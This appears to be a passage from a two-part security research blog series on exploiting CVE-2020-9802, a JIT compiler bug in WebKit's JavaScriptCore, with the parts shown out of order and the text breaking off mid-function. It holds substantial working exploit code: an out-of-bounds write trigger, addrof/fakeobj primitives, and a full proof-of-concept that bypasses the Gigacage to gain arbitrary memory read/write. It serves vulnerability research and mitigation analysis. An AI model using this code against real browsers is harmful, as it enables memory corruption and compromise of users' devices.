  1. Leaking a stack pointer in order to then find and corrupt spilled values on the stack
  2. Separating the GetIndexedPropertyStorage from the GetByVal operation so that code that modifies the spilled pointer can execute in between 
  3. Forcing the uncaged storage pointer to be spilled to the stack

Finding the Stack

As it turns out, finding a pointer to the stack in JSC given an arbitrary heap read/write is fairly easy: The topCallFrame member of the VM object is actually a pointer into the stack, as the JSC interpreter makes use of the native stack, and so the top JS call frame is also basically the top of the main thread’s stack. As such, finding the stack becomes as easy as following a pointer chain from the global object to the VM instance:

let global = Function('return this')();
let js_glob_obj_addr = addrof(global);

let glob_obj_addr = read64(Add(js_glob_obj_addr, 
    offsets.JS_GLOBAL_OBJ_TO_GLOBAL_OBJ));

let vm_addr = read64(Add(glob_obj_addr, offsets.GLOBAL_OBJ_TO_VM));

let vm_top_call_frame_addr = Add(vm_addr, 
    offsets.VM_TO_TOP_CALL_FRAME);
let vm_top_call_frame_addr_dbl = vm_top_call_frame_addr.asDouble();

let stack_ptr = read64(vm_top_call_frame_addr);
log(`[*] Top CallFrame (stack) @ ${stack_ptr}`);

Separating TypedArray Access Operations

With the opt function above that simply accesses a typed array at an index once (i.e. a[0]), the GetIndexedPropertyStorage operation will be directly followed by the GetByVal operation, thus making it impossible to corrupt the uncaged pointer even if it was spilled onto the stack. However, the following code already manages to separate the two operations:

function opt(a) {
    a[0];

    // Spill code here

    a[1];
}

This code will initially generate the following DFG IR:

v0 = GetIndexedPropertyStorage a 
GetByVal v0, 0

// Spill code here

v1 = GetIndexedPropertyStorage a
GetByVal v1, 1

Then, a bit later in the optimization pipeline, the two GetIndexedPropertyStorage operations will be CSE’d into a single one, thus separating the 2nd GetByVal from the GetIndexedPropertyStorage operation:

v0 = GetIndexedPropertyStorage a
GetByVal v0, 0

// Spill code here

// Then walk over stack here and replace backing storage pointer

GetByVal v0, 1

However, this will only happen if the spilling code doesn’t modify global state, because that could potentially detach the TypedArray’s buffer, thus invalidating its backing storage pointer. In that case, the compiler would be forced to reload the backing storage pointer for the 2nd GetByVal. As such, it’s not possible to run completely arbitrary code to force spilling, but that is not a problem as is shown next. It is also worth noting that two different indices must be used here since otherwise the GetByVals could be CSE’d as well.

Spilling Registers

With the previous two steps done, the remaining question is how to force spilling of the uncaged pointer produced by GetIndexedPropertyStorage. One way to force spilling while still allowing the CSE to happen is by performing some simple mathematical computations that require a lot of temporary values to be kept alive. The following code accomplishes this in a stylish way:

let p = 0; // Placeholder, needed for the ascii art =)

let r0=i,r1=r0,r2=r1+r0,r3=r2+r1,r4=r3+r0,r5=r4+r3,r6=r5+r2,r7=r6+r1,r8=r7+r0;
let r9=            r8+   r7,r10=r9+r6,r11=r10+r5,   r12   =r11+p      +r4+p+p;
let r13   =r12+p   +r3,   r14=r13+r2,r15=r14+r1,   r16=   r15+p   +   r0+p+p+p;
let r17   =r16+p   +r15,   r18=r17+r15,r19=r18+   r14+p   ,r20   =p   +r19+r13;
let r21   =r19+p   +r12 ,   r22=p+      r21+p+   r11+p,   r23   =p+   r22+r10;
let r24            =r23+r9   ,r25   =p   +r24   +r8+p+p   +p   ,r26   =r25+r7;
let r27   =r26+r6,r28=r27+p   +p   +r5+   p,   r29=r28+   p    +r4+   p+p+p+p;
let r30   =r29+r3,r31=r30+r2      ,r32=p      +r31+r1+p      ,r33=p   +r32+r0;
let r34=r33+r32,r35=r34+r31,r36=r25+r30,r37=r36+r29,r38=r37+r28,r39=r38+r27+p;

let r = r39; // Keep the entire computation alive, or nothing will be spilled.

The computed series is somewhat similar to the Fibonacci sequence, but requires that intermediate results be kept alive as they are needed again later on in the series. Unfortunately, this approach is somewhat fragile, as unrelated changes to various parts of the engine, in particular the register allocator, will easily break the stack spilling.

There is another, simpler way (although probably slightly less performant and certainly less visually appealing) that virtually guarantees that a raw storage pointer will be spilled to the stack: simply access as many TypedArrays as there are general purpose registers instead of just one. In that case, as there are not enough registers to hold all the raw backing storage pointers, some of them will have to be spilled to the stack where they can then be found and replaced. A naive version of this would look as follows:

typed_array1[0];
typed_array2[0];
...;
typed_arrayN[0];

// Walk over stack, find and replace spilled backing storage pointer
let stack = ...;   // JSArray pointing into stack
for (let i = 0; i < 512; i++) {
    if (stack[i] == old_ptr) {
        stack[i] = new_ptr;
        break;
    }
}

typed_array1[0] = val_to_write;
typed_array2[0] = val_to_write;
...;
typed_arrayN[0] = val_to_write;

With the main challenges overcome, the attack can now be implemented and a proof-of-concept is attached at the end of this blog post for the interested reader. All in all the technique is quite fiddly to implement initially, with a few more gotchas that have to be taken care of - see the PoC for details. However, once implemented, the resulting code is highly reliable and very fast, almost instantly achieving a truly arbitrary memory read/write primitive on both macOS and iOS and across different WebKit builds without additional changes.

Conclusion

This post showed how an attacker can (still) exploit the well-known addrof and fakeobj primitives to gain arbitrary memory read/write in WebKit. For that the StructureID mitigation had to be bypassed, while bypassing the Gigacage was mostly optional (but fun). I would personally draw the following conclusions from writing the exploit up to this point:

  1. StructureID randomization seems very weak at this point. As a fair amount of type information is stored in the JSCell bits and thus predictable by the attacker, it seems likely that many other operations can be found and abused that don’t require a valid StructureID. Furthermore, bugs that can be turned into heap out-of-bounds reads can likely be used to leak a valid StructureID.
  2. In its current state, the purpose of the Gigacage as a security mitigation is not entirely clear to me, as an (almost) arbitrary read/write primitive can be constructed from plain JSArrays which are not subject to the Gigacage. At that point, as demonstrated here, the Gigacage can also be fully bypassed, even though that is likely not necessary in practice.
  3. I think it would be worth investigating the impact (both on security and performance) of removing unboxed double JSArrays and properly caging the remaining JSArray types (which all store “boxed” JSValues). This could potentially make both the StructureID randomization and the Gigacage much stronger. In the case of this exploit, this would have prevented the construction of the addrof and fakeobj primitives in the first place (because the double <-> JSValue type confusion could no longer be constructed) as well as the limited read/write through JSArrays and would also prevent leaking a valid StructureID via an OOB access into a JSArray (arguably the most common scenario for OOB accesses).

The final part of this series will show how PC control can be gained from the read/write despite more mitigations such as PAC and APRR.

Proof-of-Concept GigaUnCager

// This function achieves arbitrary memory read/write by abusing TypedArrays.
//
// In JSC, the typed array backing storage pointers are caged as well as PAC
// signed. As such, modifying them in memory will either just lead to a crash
// or only yield access to the primitive Gigacage region which isn't very useful.
//
// This function bypasses that when one already has a limited read/write primitive:
// 1. Leak a stack pointer
// 2. Access NUM_REGS+1 typed arrays so that their uncaged and PAC-authenticated backing
//    storage pointers are loaded into registers via GetIndexedPropertyStorage.
//    As there are more of these pointers than registers, some of the raw pointers
//    will be spilled to the stack.
// 3. Find and modify one of the spilled pointers on the stack
// 4. Perform a second access to every typed array which will now load and
//    use the previously spilled (and now corrupted) pointers.
//
// It is also possible to implement this using a single typed array and separate
// code to force spilling of the backing storage pointer to the stack. However,
// this way it is guaranteed that at least one pointer will be spilled to the
// stack regardless of how the register allocator works as long as there are
// more typed arrays than registers.
//
// NOTE: This function is only a template, in the final function, every
// line containing an "$r" will be duplicated NUM_REGS times, with $r
// replaced with an incrementing number starting from zero.
//
const READ = 0, WRITE = 1;
let memhax_template = function memhax(memviews, operation, address, buffer, length, stack, needle) {
    // See below for the source of these preconditions.
    if (length > memviews[0].length) {
        throw "Memory access too large";
    } else if (memviews.length % 2 !== 1) {
        throw "Need an odd number of TypedArrays";
    }

    // Save old backing storage pointer to restore it afterwards.
    // Otherwise, GC might end up treating the stack as a MarkedBlock.
    let savedPtr = controller[1];

    // Function to get a pointer into the stack, below the current frame.
    // This works by creating a new CallFrame (through a native function), which
    // will be just below the CallFrame for the caller function in the stack,
    // then reading VM.topCallFrame which will be a pointer to that CallFrame:
    // https://github.com/WebKit/webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/
    // Source/JavaScriptCore/runtime/VM.h#L652)
    function getsp() {
        function helper() {
            // This code currently assumes that whatever precedes topCallFrame in
            // memory is non-zero. This seems to be true on all tested platforms.
            controller[1] = vm_top_call_frame_addr_dbl;
            return memarr[0];
        }
        // DFGByteCodeParser won't inline Math.max with more than 3 arguments
        // https://github.com/WebKit/webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/
        // Source/JavaScriptCore/dfg/DFGByteCodeParser.cpp#L2244
        // As such, this will force a new CallFrame to be created.
        let sp = Math.max({valueOf: helper}, -1, -2, -3);
        return Int64.fromDouble(sp);
    }

    let sp = getsp();

    // Set the butterfly of the |stack| array to point to the bottom of the current
    // CallFrame, thus allowing us to read/write stack data through it. Our current
    // read/write only works if the value before what butterfly points to is nonzero.
    // As such, we might have to try multiple stack values until we find one that works.
    let tries = 0;
    let stackbase = new Int64(sp);
    let diff = new Int64(8);
    do {
        stackbase.assignAdd(stackbase, diff);
        tries++;
        controller[1] = stackbase.asDouble();
    } while (stack.length < 512 && tries < 64);

    // Load numregs+1 typed arrays into local variables.
    let m$r = memviews[$r];

    // Load, uncage, and untag all array storage pointers.
    // Since we have more than numreg typed arrays, at least one of the
    // raw storage pointers will be spilled to the stack where we'll then
    // corrupt it afterwards.
    m$r[0] = 0;

    // After this point and before the next access to memview we must not
    // have any DFG operations that write Misc (and as such World), i.e could
    // cause a typed array to be detached. Otherwise, the 2nd memview access
    // will reload the backing storage pointer from the typed array.

    // Search for correct offset.
    // One (unlikely) way this function could fail is if the compiler decides
    // to relocate this loop above or below the first/last typed array access.
    // This could easily be prevented by creating artificial data dependencies
    // between the typed array accesses and the loop.
    //
    // If we wanted, we could also cache the offset after we found it once.
    let success = false;
    // stack.length can be a negative number here so fix that with a bitwise and.
    for (let i = 0; i < Math.min(stack.length & 0x7fffffff, 512); i++) {
        // The multiplication below serves two purposes:
        //
        // 1. The GetByVal must have mode "SaneChain" so that it doesn't bail
        //    out when encountering a hole (spilled JSValues on the stack often
        //    look like NaNs): https://github.com/WebKit/webkit/blob/
        //    e86028b7dfe764ab22b460d150720b00207f9714/Source/JavaScriptCore/
        //    dfg/DFGFixupPhase.cpp#L949
        //    Doing a multiplication achieves that: https://github.com/WebKit/
        //    webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/Source/
        //    JavaScriptCore/dfg/DFGBackwardsPropagationPhase.cpp#L368
        //
        // 2. We don't want |needle| to be the exact memory value. Otherwise,
        //    the JIT code might spill the needle value to the stack as well,
        //    potentially causing this code to find and replace the spilled needle
        //    value instead of the actual buffer address.
        //
        if (stack[i] * 2 === needle) {
            stack[i] = address;
            success = i;
            break;
        }
    }

    // Finally, arbitrary read/write here :)
    if (operation === READ) {
        for (let i = 0; i < length; i++) {
            buffer[i] = 0;
            // We assume an odd number of typed arrays total, so we'll do one
            // read from the corrupted address and an even number of reads
            // from the inout buffer. Thus, XOR gives us the right value.
            // We could also zero out the inout buffer before instead, but
            // this seems nicer :)
            buffer[i] ^= m$r[i];
        }
    } else if (operation === WRITE) {
        for (let i = 0; i < length; i++) {
            m$r[i] = buffer[i];
        }
    }

    // For debugging: can fetch SP here again to verify we didn't bail out in between.
    //let end_sp = getsp();

    controller[1] = savedPtr;

    return {success, sp, stackbase};
}

// Add one to the number of registers so that:
// - it's guaranteed that there are more values than registers (note this is
//   overly conservative, we'd surely get away with less)
// - we have an odd number so the XORing logic for READ works correctly
let nregs = NUM_REGS + 1;

// Build the real function from the template :>
// This simply duplicates every line containing the marker nregs times.
let source = [];
let template = memhax_template.toString();
for (let line of template.split('\n')) {
    if (line.includes('$r')) {
        for (let reg = 0; reg < nregs; reg++) {
            source.push(line.replace(/\$r/g, reg.toString()));
        }
    } else {
        source.push(line);
    }
}
source = source.join('\n');
let memhax = eval(`(${source})`);
//log(memhax);

// On PAC-capable devices, the backing storage pointer will have a PAC in the
// top bits which will be removed by GetIndexedPropertyStorage. As such, we are
// looking for the non-PAC'd address, thus the bitwise AND.
if (IS_IOS) {
    buf_addr.assignAnd(buf_addr, new Int64('0x0000007fffffffff'));
}
// Also, we don't search for the address itself but instead transform it slightly.
// Otherwise, it could happen that the needle value is spilled onto the stack
// as well, thus causing the function to corrupt the needle value.
let needle = buf_addr.asDouble() * 2;

log(`[*] Constructing arbitrary read/write by abusing TypedArray @ ${buf_addr}`);

// Buffer to hold input/output data for memhax.
let inout = new Int32Array(0x1000);

// This will be the memarr after training.
let dummy_stack = [1.1, buf_addr.asDouble(), 2.2];

let views = new Array(nregs).fill(view);

let lastSp = 0;
let spChanges = 0;
for (let i = 0; i < ITERATIONS; i++) {
    let out = memhax(views, READ, 13.37, inout, 4, dummy_stack, needle);
    out = memhax(views, WRITE, 13.37, inout, 4, dummy_stack, needle);
    if (out.sp.asDouble() != lastSp) {
        lastSp = out.sp.asDouble();
        spChanges += 1;
        // It seems we'll see 5 different SP values until the function is FTL compiled
        if (spChanges == 5) {
            break;
        }
    }
}

// Now use the real memarr to access stack memory.
let stack = memarr;

// An address that's safe to clobber
let scratch_addr = Add(buf_addr, 42*4);

// Value to write
inout[0] = 0x1337;

for (let i = 0; i < 10; i++) {
    view[42] = 0;

    let out = memhax(views, WRITE, scratch_addr.asDouble(), inout, 1, stack, needle);

    if (view[42] != 0x1337) {
        throw "failed to obtain reliable read/write primitive";
    }
}

log(`[+] Got stable arbitrary memory read/write!`);
if (DEBUG) {
    log("[*] Verifying exploit stability...");
    gc();
    log("[*] All stable!");
}


JITSploitation I: A JIT Bug

By Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

What might a browser renderer exploit look like in 2020? I set out to answer that question in January this year. Since it’s one of my favorite areas in computer science, I wanted to find a JIT compiler vulnerability, and I was especially interested in trying to find (new) types of vulnerabilities that my fuzzer would have a hard time finding.

As WebKit (on iOS and likely soon on ARM-powered macOS) arguably features the most sophisticated exploit mitigations at present, including hardware supported mitigations like PAC and APRR, it seemed fitting to focus on WebKit, or in fact JavaScriptCore (JSC), its JavaScript engine.

This blog post series will:
  • Provide a short introduction to JIT engines and in particular the Common-Subexpression Elimination (CSE) optimization
  • Explain a JIT compiler vulnerability - CVE-2020-9802 - stemming from incorrect CSE and how it can be exploited for an out-of-bounds read or write on the JSC heap
  • Provide an in depth discussion of WebKit’s renderer exploit mitigations on iOS, in particular: StructureID randomization, the Gigacage, Pointer Authentication (PAC) and JIT Hardening on top of APRR (essentially per-thread page permissions), how they work, potential weaknesses, and how they were bypassed during exploit development

The proof of concept exploit code accompanying this blog post series can be found here. It was tested against Mobile Safari on iOS 13.4.1 and Safari 13.1 on macOS 10.15.4.

This series strives to be understandable for security researchers and engineers without strong backgrounds in browser exploitation. It also attempts to explain the various JIT compilation mechanisms used (and abused) for exploit development. However, it should be noted that JIT compilers are likely among the most complex attack surfaces of a web browser (and that the exploited vulnerability is likely particularly complex), and are thus not particularly beginner friendly. On the other hand, the vulnerabilities found therein are also frequently among the most powerful ones, with a good chance to stay exploitable for quite some time to come.

Introduction

As there are by now many good public resources on JIT compilers, this section only provides a brief 2 minute introduction/refresher to JavaScript JITing.

Take the following JavaScript code:

function foo(o, y) {
    let x = o.x;
    return x + y;
}

for (let i = 0; i < 10000; i++) {
    foo({x: i}, 42);
}

As JIT compilation is costly, it is only performed for code that is repeatedly executed. As such, the function foo will execute inside the interpreter (or a cheap “baseline” JIT) for some time. During that time, value profiles will be collected, which, for foo, would look something like this:

  • o: JSObject with a property .x at offset 16
  • x: Int32
  • y: Int32

Later, when the optimizing JIT compiler eventually kicks in, it starts by translating the JavaScript source code (or, more likely the interpreter bytecode) into the JIT compiler’s own intermediate code representation. In the DFG, JavaScriptCore’s optimizing JIT compiler, this is done by the DFGByteCodeParser.

The function foo in DFG IR might initially look something like this:

v0 = GetById o, .x
v1 = ValueAdd v0, y
Return v1

Here, GetById and ValueAdd are fairly generic (or high-level) operations, capable of handling different input types (e.g. ValueAdd would also be able to concatenate strings).

Next, the JIT compiler inspects the value profiles and, based on them, will speculate that similar input types will be used in the future. Here, it would speculate that o would always be a certain kind of JSObject and x and y Int32s. However, as there is no guarantee the speculations will always be true, the compiler has to guard the speculations, typically with cheap runtime type checks:

CheckType o, “Object with property .x at offset 16”
CheckType y, Int32
v0 = GetByOffset o, 16
CheckType v0, Int32
v1 = ArithAdd v0, y
Return v1

Also note how the GetById and ValueAdd have been specialized to the more efficient (and less generic) GetByOffset and ArithAdd operations. In DFG, this speculative optimization happens in multiple places, for example, already in DFGByteCodeParser.

At this point, the IR code is essentially typed as the speculation guards allow type inference. Next, numerous code optimizations are performed, such as loop-invariant code motion or constant folding. An overview of the optimizations done by DFG can be extracted from DFGPlan.

Finally, the now-optimized IR is lowered to machine code. In DFG this is done directly by the DFGSpeculativeJIT while in FTL mode the DFG IR is first lowered to B3, another IR, which undergoes further optimizations before itself being lowered to machine code.

Next up, a specific optimization Common-Subexpression Elimination (CSE) is discussed.

Common-Subexpression Elimination (CSE)

The idea behind this optimization is to detect duplicate computations (or expressions) and to merge them into a single computation. As an example, consider the following JavaScript code:

    let c = Math.sqrt(a*a + a*a);

Assume further that a is known to be a primitive value (e.g. a Number); a JavaScript JIT compiler can then convert the code to the following:

   let tmp = a*a;
   let c = Math.sqrt(tmp + tmp);

And by doing so save one ArithMul operation at runtime. This optimization is called Common Subexpression Elimination (CSE).

Now, take the following JavaScript code instead:

   let c = o.a;
   f();
   let d = o.a;

Here, the compiler cannot eliminate the second property load operation during CSE, as the function call in between could have changed the value of the .a property.

In JSC, the modelling of whether an operation can be subject to CSE (and under which circumstances) is done in DFGClobberize. For ArithMul, DFGClobberize states:

    case ArithMul:
        switch (node->binaryUseKind()) {
        case Int32Use:
        case Int52RepUse:
        case DoubleRepUse:
            def(PureValue(node, node->arithMode()));
            return;
        case UntypedUse:
            clobberTop();
            return;
        default:
            DFG_CRASH(graph, node, "Bad use kind");
        }

The def() of the PureValue here expresses that the computation does not rely on any context and thus that it will always yield the same result when given the same inputs. However, note that the PureValue is parameterized by the ArithMode of the operation, which specifies whether the operation should handle (e.g. by bailing out to the interpreter) integer overflows or not. The parameterization in this case prevents two ArithMul operations with different handling of integer overflows from being substituted for each other. An operation that handles overflows is also commonly referred to as a “checked” operation, and an “unchecked” operation is one that does not detect or handle overflows.
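
To make the checked/unchecked distinction more concrete, here is a small standalone C sketch (an analogy, not JSC code; it relies on the GCC/Clang __builtin_mul_overflow builtin) contrasting a multiplication that detects 32-bit overflow with one that silently wraps around. This is roughly the behavioral difference that the ArithMode parameter captures:

#include <stdio.h>
#include <stdint.h>

/* "Checked" multiply: detect int32 overflow (a checked ArithMul would bail
 * out to the interpreter in this situation). */
static int checked_mul(int32_t a, int32_t b, int32_t *out) {
    return !__builtin_mul_overflow(a, b, out);   /* 0 on overflow */
}

/* "Unchecked" multiply: simply wrap around modulo 2^32. */
static int32_t unchecked_mul(int32_t a, int32_t b) {
    return (int32_t)((uint32_t)a * (uint32_t)b);
}

int main(void) {
    int32_t r;
    if (!checked_mul(0x10000, 0x10000, &r))
        printf("checked:   overflow detected -> bail out\n");
    printf("unchecked: %d\n", unchecked_mul(0x10000, 0x10000));  /* wraps to 0 */
    return 0;
}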

In contrast, for GetByOffset (which can be used for the property load), DFGClobberize contains:

   case GetByOffset:
       unsigned identifierNumber = node->storageAccessData().identifierNumber;
       AbstractHeap heap(NamedProperties, identifierNumber);
       read(heap);
       def(HeapLocation(NamedPropertyLoc, heap, node->child2()), LazyNode(node));

This in essence says that the value produced by this operation depends on the NamedProperty "abstract heap". As such, eliminating a second GetByOffset is only sound if there are no writes to the NamedProperties abstract heap (i.e. to memory locations containing property values) between the two GetByOffset operations.

The Bug

Consider how DFGClobberize modelled the ArithNegate operation prior to the fix:

    case ArithNegate:
        if (node->child1().useKind() == Int32Use || ...)
            def(PureValue(node));          // <- only the input matters, not the ArithMode

This could cause CSE to substitute a checked ArithNegate with an unchecked one. In the case of ArithNegate (a negation of a 32bit integer), an integer overflow can only occur in one specific situation: when negating INT_MIN: -2147483648. This is because 2147483648 is not representable as a 32 bit signed integer, and so -INT_MIN causes an integer overflow and again results in INT_MIN.

The bug was found by studying the CSE defs in DFGClobberize, thinking about why some PureValues (and which ones) needed to be parameterized with the ArithMode, then searching for cases where that parameterization was missing. 

The patch for this bug is very simple:

-            def(PureValue(node));
+            def(PureValue(node, node->arithMode()));

This now teaches CSE to take the arithMode (unchecked or checked) of an ArithNegate operation into account. As such, two ArithNegate operations with different modes can no longer be substituted for each other.

In addition to ArithNegate, DFGClobberize also missed the ArithMode for the ArithAbs operation.

Note that this type of bug is likely very hard to detect through fuzzing as 
  • the fuzzer would need to create two ArithNegate operations on the same inputs but with a different ArithMode,
  • the fuzzer would need to trigger the case where the difference in the ArithMode matters, which in this case means it would need to negate the value INT_MIN, and,
  • unless the engine has custom “sanitizers” for detecting these types of issues early on and unless differential fuzzing is done, the fuzzer would then somehow still need to turn this condition into a memory safety violation or an assertion failure. As is shown in the next section, this step is likely the hardest and extremely unlikely to happen by chance

Achieving Out-Of-Bounds

The JavaScript function shown below achieves out-of-bounds access by an arbitrary index (in this case 7) into a JSArray through this bug:

function hax(arr, n) {
    n |= 0;
    if (n < 0) {
        let v = (-n)|0;
        let i = Math.abs(n);
        if (i < arr.length) {
            if (i & 0x80000000) {
                i += -0x7ffffff9;
            }
            if (i > 0) {
                arr[i] = 1.04380972981885e-310;
            }
        }
    }
}

The following is a step-by-step explanation of how this PoC was constructed. At the end of this section there is also a commented version of the above function.

First of all, ArithNegate is only used to negate integers (the more generic ValueNegate operation can negate all JavaScript values), but in the JavaScript specification Numbers are generally floating point values. As such it is necessary to “hint” to the compiler that the input value will always be integer. This is easily accomplished by first performing a bitwise operation, which will always result in 32-bit signed integer values:

    n = n|0; // n will be an integer value now

With that, it is now possible to construct an unchecked ArithNegate operation (with which a checked one will later be CSE’d):

    n = n|0;
    let v = (-n)|0;

Here, during the DFGFixupPhase, the negation of n will be converted to an unchecked ArithNeg operation. The compiler is able to omit the overflow check as the only use of the negated value is the bitwise or, and that behaves the same for the overflowed and “correct” value:  

js> -2147483648 | 0
-2147483648
js> 2147483648 | 0
-2147483648

Next, it is necessary to construct a checked ArithNegate operation with n as its input. One interesting (why will become clear in a bit) way to obtain an ArithNegate is by having the compiler strength-reduce an ArithAbs operation into an ArithNegate operation. This will only happen if the compiler can prove that n will be a negative number, which can easily be accomplished as DFG’s IntegerRangeOptimization pass is path-sensitive:

n = n|0;
if (n < 0) {
    // Compiler knows that n will be a negative integer here

    let v = (-n)|0;
    let i = Math.abs(n);
}

Here, during bytecode parsing, the call to Math.abs will first be lowered to an ArithAbs operation because the compiler is able to prove that the call will always result in the execution of the mathAbs function and so replaces it with the ArithAbs operation, which has the same runtime semantics but doesn’t require a function call at runtime. The compiler is in essence inlining Math.abs that way. Later, the IntegerRangeOptimization will convert the ArithAbs to a checked ArithNegate (the ArithNegate must be checked as INT_MIN can’t be ruled out for n). As such, the two statements inside the if statement become essentially (in pseudo DFG IR):

v = ArithNeg(unchecked) n
i = ArithNeg(checked) n

Which, due to the bug, CSE will later turn into

v = ArithNeg(unchecked) n
i = v

At this point, calling the miscompiled function with INT_MIN for n will cause i to also be INT_MIN, even though it really should be a positive number. 

This by itself is a correctness issue, but not yet a security issue. One (and possibly the only) way to turn this bug into a security issue is by abusing a JIT optimization already popular among security researchers: bounds-check elimination. 

Going back to the IntegerRangeOptimization pass, the value of i was already marked as being a positive number. For bounds check elimination to happen, however, the value must also be known to be less than the length of the array being indexed. This is easily accomplished:

function hax(arr, n) {
  n = n|0;
  if (n < 0) {
    let v = (-n)|0;
    let i = Math.abs(n);
    if (i < arr.length) {
        arr[i];
    }
  }
}

When now triggering the bug, i will be INT_MIN and will thus pass the comparison and perform the array access. However, the bounds check will have been removed as IntegerRangeOptimization has falsely (although it’s technically not its fault) determined i to always be in bounds.

Before the bug can be triggered, the JavaScript code has to be JIT compiled. This is generally achieved simply by executing the code a large number of times. However, the indexed access into arr will only be lowered (by the SSALoweringPhase) to a CheckInBounds (that will later be removed) and an un-bounds-checked GetByVal if the access is speculated to be in bounds. This will not be the case if the access has frequently been observed to be out-of-bounds during interpretation or execution in baseline JIT. As such, during “training” of the function it is necessary to use sane, in-bounds indices:

    for (let i = 1; i <= ITERATIONS; i++) {
        let n = -4;
        if (i == ITERATIONS) {
            n = -2147483648;        // INT_MIN
        }
        hax(arr, n);
    }

Running this code inside JSC will crash:

lldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc poc.js
   (lldb) r
   Process 12237 stopped
   * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1c1fc61348)
       frame #0: 0x000051fcfaa06f2e
   ->  0x51fcfaa06f2e: movsd  xmm0, qword ptr [rax + 8*rcx] ; xmm0 = mem[0],zero
   Target 0: (jsc) stopped.
   (lldb) reg read rcx
        rcx = 0x0000000080000000

However, inconveniently, the out-of-bounds index (in rcx) will always be INT_MIN, thus accessing 0x80000000 * 8 = 16GB behind the array. While probably exploitable, it’s not exactly the best exploit primitive to start from.

The final trick to achieve an OOB access with an arbitrary index is to subtract a constant from i which will wrap INT_MIN around to an arbitrary, positive number. As i is thought (by the DFG compiler) to always be positive, the subtraction will become unchecked and the overflow will thus go unnoticed.

However, as the subtraction invalidates integer range information about the lower bound, an additional `if i > 0` check is required afterwards to again trigger bounds check removal. Also, as the subtraction would turn the integers used during training into out-of-bounds indices, it is only executed conditionally if the input value is negative. Fortunately, the DFG compiler isn’t (yet) clever enough to determine that that condition should never be true in which case it could just optimize away the subtraction entirely :)
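
To double-check the arithmetic with the constant used in the PoC, the following standalone C snippet (an illustration of the 32-bit wraparound, not exploit code) reproduces what the unchecked ArithAdd computes and shows why the out-of-bounds index ends up being 7:

#include <stdio.h>
#include <stdint.h>

int main(void) {
    int32_t i = INT32_MIN;   /* value of i after the miscompiled Math.abs(n) */
    /* The ArithAdd is unchecked, so it wraps modulo 2^32 instead of bailing out: */
    int32_t idx = (int32_t)((uint32_t)i - 0x7ffffff9u);
    printf("%d\n", idx);     /* prints 7 -- the arbitrary OOB index from earlier */
    return 0;
}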

With all of that, shown below is again the function from the start, however this time with comments. When JITed and given INT_MIN for n it causes an out-of-bounds write of a controlled value (0x0000133700001337) into the length fields of a JSArray directly following arr in memory. Note that the success of this step depends on the correct heap layout. However, as the bug is powerful enough to be exploited for a controlled OOB read as well, it is possible to ensure the correct heap layout is present before triggering the memory corruption.

function hax(arr, n) {
    // Force n to be a 32bit integer.
    n |= 0;

    // Let IntegerRangeOptimization know that 
    // n will be a negative number inside the body.
    if (n < 0) {
        // Force "non-number bytecode usage" so the negation 
        // becomes unchecked and as such INT_MIN will again
        // become INT_MIN in the last iteration.
        let v = (-n)|0;

        // As n is known to be negative here, this ArithAbs 
        // will become a ArithNegate. That negation will be 
        // checked, but then be CSE'd for the previous, 
        // unchecked one. This is the compiler bug.
        let i = Math.abs(n);

        // However, IntegerRangeOptimization has also marked 
        // i as being >= 0...

        if (i < arr.length) {
            // .. so here IntegerRangeOptimization now believes 
            // i will be in the range [0, arr.length) while i 
            // will actually be INT_MIN in the final iteration.

            // This condition is written this way so integer 
            // range optimization isn't able to propagate range 
            // information (in particular that i must be a 
            // negative integer) into the body.
            if (i & 0x80000000) {
                // In the last iteration, this will turn INT_MIN 
                // into an arbitrary, positive number since the
                // ArithAdd has been made unchecked by integer range
                // optimization (as it believes i to be a positive
                // number) and so doesn't bail out when overflowing
                // int32.
                i += -0x7ffffff9;
            }

            // This conditional branch is now necessary due to 
            // the subtraction above. Otherwise, 
            // IntegerRangeOptimization couldn’t prove that i 
            // was always positive.
            if (i > 0) {
                // In here, IntegerRangeOptimization again believes
                // i to be in the range [0, arr.length) and thus
                // eliminates the CheckBounds node, leading to a 
                // controlled OOB access. This write will then corrupt
                // the header of the following JSArray, setting its
                // length and capacity to 0x1337.
                arr[i] = 1.04380972981885e-310;
            }
        }
    }
}

Addrof/Fakeobj

At this point, the two low-level exploit primitives addrof and fakeobj can be constructed. The addrof(obj) primitive returns the address (as double) of the given JavaScript object in memory:

    let obj = {a: 42};
    let addr = addrof(obj);
    // 2.211548541e-314 (0x000000010acdc250 as 64bit integer)

 The fakeobj(addr) primitive returns a JSValue containing the given address as payload:

    let obj2 = fakeobj(addr);
    obj2 === obj;
    // true

These primitives are useful as they basically allow two things: breaking heap ASLR so that controlled data can be placed at a known address and providing a way to construct and “inject” fake objects into the engine. But more on exploitation in part 2.
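
As a side note, the correspondence between the tiny double returned by addrof and the raw object address can be verified offline with a bit of type punning. The following standalone C snippet (purely illustrative, not part of the PoC) reinterprets the 64-bit address from the example above as an IEEE-754 double, which is what reading the same memory slot through an array of unboxed doubles does:

#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void) {
    uint64_t addr = 0x000000010acdc250ULL;   /* address from the addrof example */
    double d;
    memcpy(&d, &addr, sizeof(d));            /* reinterpret the raw bit pattern */
    printf("%.9e\n", d);                     /* ~2.211548541e-314 */
    return 0;
}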

The two primitives can be constructed with two JSArrays with different storage types: by overlapping a JSArray which stores (unboxed/raw) doubles with a JSArray that stores JSValues (boxed/tagged values that can for example be pointers to JSObjects): 

Image: An arrangement of two adjacent JSArray objects in memory


This then allows reading/writing pointer values in obj_arr as doubles through float_arr:

    let noCoW = 13.37;
    let target = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6];
    let float_arr = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6];
    let obj_arr = [{}, {}, {}, {}, {}, {}, {}];

    // Trigger the bug to write past the end of the target array and
    // thus corrupting the length of the float_arr following it
    hax(target, n);

    assert(float_arr.length == 0x1337);

    // (OOB) index into float_arr that overlaps with the first element    
    // of obj_arr.
    const OVERLAP_IDX = 8;

    function addrof(obj) {
        obj_arr[0] = obj;
